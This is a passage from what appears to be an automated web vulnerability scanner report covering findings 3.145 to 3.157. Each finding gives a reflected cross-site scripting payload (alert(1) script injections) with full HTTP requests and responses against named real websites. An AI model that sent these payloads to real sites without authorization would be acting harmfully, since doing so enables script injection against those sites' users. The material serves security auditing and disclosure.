Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c8675355739d1755a2b61ee584344b92; path=/
Set-Cookie: click_id518=44304396; expires=Tue, 01-Mar-2011 14:21:05 GMT; path=/
Set-Cookie: checksum518=56c9945d2b40c3166882db1360344b0b; expires=Tue, 01-Mar-2011 14:21:05 GMT; path=/
Content-Type: text/html
Content-Length: 135

<meta http-equiv="refresh" content="0;url=http://weekly-prizes.com/1.php?c=us&subid=154aaffd\\\"><script>alert(1)</script>4fa49262733">

3.145. http://zones.computerworld.com/ncircle/registration.php [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://zones.computerworld.com
Path:   /ncircle/registration.php

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf4cf"><script>alert(1)</script>8127f6b53d2 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncircle/registration.php?from=cf4cf"><script>alert(1)</script>8127f6b53d2&src=csozne&tab=1&item=5 HTTP/1.1
Host: zones.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:08 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cteonnt-Length: 2152
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2152

<style type="text/css">
   @import url("/scripts/css.css");
</style>


<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" http://www.w3.org/TR/html4/loose.dtd>
<html>
   <head>
   <met
...[SNIP]...
<iframe name="good" class="registration_iframe" src="http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf"><script>alert(1)</script>8127f6b53d2" width="930" height="1000" border="0" frameborder="0" scrolling="no" onload="scrollit();">
...[SNIP]...

3.146. http://zones.computerworld.com/ncircle/registration.php [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://zones.computerworld.com
Path:   /ncircle/registration.php

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6566b'%3balert(1)//04743b660f0 was submitted in the from parameter. This input was echoed as 6566b';alert(1)//04743b660f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncircle/registration.php?from=cso6566b'%3balert(1)//04743b660f0&src=csozne&tab=1&item=5 HTTP/1.1
Host: zones.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:10 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cteonnt-Length: 2128
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2128

<style type="text/css">
   @import url("/scripts/css.css");
</style>


<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" http://www.w3.org/TR/html4/loose.dtd>
<html>
   <head>
   <met
...[SNIP]...
<!-- window.open('http://www.accelacomm.com/jlp/csozne/10/50552781>/_from=cso6566b';alert(1)//04743b660f0', 'site', 'toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=100%,height=100%,border=0' 'border=0');//-->
...[SNIP]...

3.147. http://zones.computerworld.com/ncircle/registration.php [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://zones.computerworld.com
Path:   /ncircle/registration.php

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f163e"><script>alert(1)</script>0815371cdeb was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncircle/registration.php?from=cso&src=f163e"><script>alert(1)</script>0815371cdeb&tab=1&item=5 HTTP/1.1
Host: zones.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:14 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cteonnt-Length: 2178
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2178

<style type="text/css">
   @import url("/scripts/css.css");
</style>


<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" http://www.w3.org/TR/html4/loose.dtd>
<html>
   <head>
   <met
...[SNIP]...
<iframe name="good" class="registration_iframe" src="http://www.accelacomm.com/jlp/f163e"><script>alert(1)</script>0815371cdeb/10/50552781/_from=cso" width="930" height="1000" border="0" frameborder="0" scrolling="no" onload="scrollit();">
...[SNIP]...

3.148. http://zones.computerworld.com/ncircle/registration.php [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://zones.computerworld.com
Path:   /ncircle/registration.php

Issue detail

The value of the src request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4778'%3balert(1)//c8ec899850f was submitted in the src parameter. This input was echoed as e4778';alert(1)//c8ec899850f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncircle/registration.php?from=cso&src=csoznee4778'%3balert(1)//c8ec899850f&tab=1&item=5 HTTP/1.1
Host: zones.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:16 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cteonnt-Length: 2160
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2160

<style type="text/css">
   @import url("/scripts/css.css");
</style>


<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" http://www.w3.org/TR/html4/loose.dtd>
<html>
   <head>
   <met
...[SNIP]...
<!-- window.open('http://www.accelacomm.com/jlp/csoznee4778';alert(1)//c8ec899850f/10/50552781>
...[SNIP]...

3.149. http://zones.computerworld.com/ncircle/registration.php [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://zones.computerworld.com
Path:   /ncircle/registration.php

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ce37"><script>alert(1)</script>810f4ffdf43 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ncircle/registration.php?from=cso&src=csozne&tab=18ce37"><script>alert(1)</script>810f4ffdf43&item=5 HTTP/1.1
Host: zones.computerworld.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:45:18 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cteonnt-Length: 2140
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 2140

<style type="text/css">
   @import url("/scripts/css.css");
</style>


<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" http://www.w3.org/TR/html4/loose.dtd>
<html>
   <head>
   <met
...[SNIP]...
<div id="tab18ce37"><script>alert(1)</script>810f4ffdf43" class="topTabs">
...[SNIP]...

3.150. http://www.au2m8.com/v/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.au2m8.com
Path:   /v/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b6a8'-alert(1)-'c4271604a3d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v/ HTTP/1.1
Host: www.au2m8.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7b6a8'-alert(1)-'c4271604a3d

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NQJKKYS192.168.100.219CKOWU; path=/
Date: Mon, 28 Feb 2011 13:34:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate, s-maxage=0
Expires: Mon, 28 Feb 2011 13:34:28 GMT
Last-Modified: Mon, 28 Feb 2011 13:34:28 GMT
Set-Cookie: countryID=us; expires=Tue, 28-Feb-2012 13:34:28 GMT; path=/; domain=.au2m8.com
Set-Cookie: bpl1298903668=1298900068; expires=Mon, 28-Feb-2011 14:34:28 GMT; path=/; domain=.au2m8.com
Set-Cookie: videoID=expired; expires=Mon, 28-Feb-2011 14:34:28 GMT; path=/; domain=.au2m8.com
Set-Cookie: auto=expired; expires=Mon, 28-Feb-2011 14:34:28 GMT; path=/; domain=.au2m8.com
Set-Cookie: playlist=deleted; expires=Sun, 28-Feb-2010 13:34:27 GMT; path=/; domain=.au2m8.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14850

...<html>
    <head>
    <meat http-equiv="Expires" CONTENT="Mon, 28 Feb 2011 13:34:28 GMT">
    <title>Goviral Network Tutorial</title>
    <style type='text/css'>
    <!
...[SNIP]...
a;
lxz = lala;
}
    if(ns != undefined && ns !='') {
    ln1 = ns;
    } else {
    ln1 = 'www.google.com/search?hl=en&q=7b6a8'-alert(1)-'c4271604a3d';
    }
    if(ln1 != ''){
    ln = escape(ln1);
               }else{
    ln2 = document.referrer;
                if(ln2 != ''){
    ln = escape(ln2);
                }el
...[SNIP]...

3.151. http://www.hidglobal.com/onlineOrderStatusRegistration.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1cb2'><script>alert(1)</script>741bd7b7642 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /onlineOrderStatusRegistration.php HTTP/1.1
Host: www.hidglobal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d1cb2'><script>alert(1)</script>741bd7b7642

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=eu38ssb9vf2qj3hel60nulp0k0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=d1cb2'><script>alert(1)</script>741bd7b7642'>
...[SNIP]...

3.152. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c192"-alert(1)-"3d22ae840f5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /news/security/vulnerabilities/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5c192"-alert(1)-"3d22ae840f5
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:36:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 28 Feb 2011 13:36:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=14MTYJGJHPWJJQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32298


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...

s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="173.193.214.243 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5c192"-alert(1)-"3d22ae840f5";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop21="";

/* Conversion Variables */
s.campaign="";
s.state="";
s.zip=""
...[SNIP]...

3.153. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.liverpoolonlinedegrees.co.uk
Path:   /2x/prequal.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a858"><script>alert(1)</script>e735a89a535 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /2x/prequal.jsp HTTP/1.1
Host: www.liverpoolonlinedegrees.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9a858"><script>alert(1)</script>e735a89a535

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP="ALL DSP COR CURa ADMa DEVa PSAa OUR BUS PHY ONL UNI COM NAV DEM STA PRE"
Cache-Control: public
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 28 Feb 2011 13:37:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=siYEKRz3V5qwFBpTWgPeuA**.app2-all2; Path=/
Set-Cookie: CLK=0#1298900231141; Expires=Tue, 26-Feb-2019 13:37:11 GMT; Path=/
Set-Cookie: CLK=0#1298900231141; Expires=Tue, 26-Feb-2019 13:37:11 GMT; Path=/
Content-Length: 33038

<!-- Copyright Quinstreet Inc., 2011 -->
<html>
<head>
<title> University of Liverpool</title>
<link rel="stylesheet" href="Style.css" type="text/css"/>
<script language="JavaScript" type="text/javasc
...[SNIP]...
<Input Name="A127" Value="http://www.google.com/search?hl=en&q=9a858"><script>alert(1)</script>e735a89a535" Type="hidden" tabIndex="15"/>
...[SNIP]...

3.154. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec06"><script>alert(1)</script>4bdb5a75468 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9ec06"><script>alert(1)</script>4bdb5a75468

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t0gi96r9vqochnbavcqftgdhu0; path=/
Connection: close
Content-Type: text/html
Content-Length: 21967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html" title="9ec06"><script>alert(1)</script>4bdb5a75468">
...[SNIP]...

3.155. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4a666<script>alert(1)</script>6e41ba58dc7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4a666<script>alert(1)</script>6e41ba58dc7

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4oq202rglfpv6h85aosd9ibn77; path=/
Connection: close
Content-Type: text/html
Content-Length: 22289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</script>6e41ba58dc7">4a666<script>alert(1)</script>6e41ba58dc7</a>
...[SNIP]...

3.156. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab56f"-alert(1)-"a47f4268456 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /spportal/spportalFlow.do HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ab56f"-alert(1)-"a47f4268456

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Mon, 28 Feb 2011 13:38:57 GMT
Set-Cookie: JSESSIONID=F21319170E3705C9C16EF53C999FFD0A.app9-a2; Path=/; Secure
Set-Cookie: trafficSource=default; Expires=Wed, 30-Mar-2011 13:38:57 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Wed, 30-Mar-2011 13:38:57 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b;path=/;httponly


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=ab56f"-alert(1)-"a47f4268456";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

3.157. http://www.watchmouse.com/en/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2618'-alert(1)-'10a136a031f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /en/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2618'-alert(1)-'10a136a031f

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-18f0856b42d659e12899dfc9a1a6ae12"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.google.com/search?hl=en&q=e2618'-alert(1)-'10a136a031f::en');
           var serverRef = encodeURIComponent('http://www.google.com/search?hl=en&q=e2618'-alert(1)-'10a136a031f');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referre
...[SNIP]...
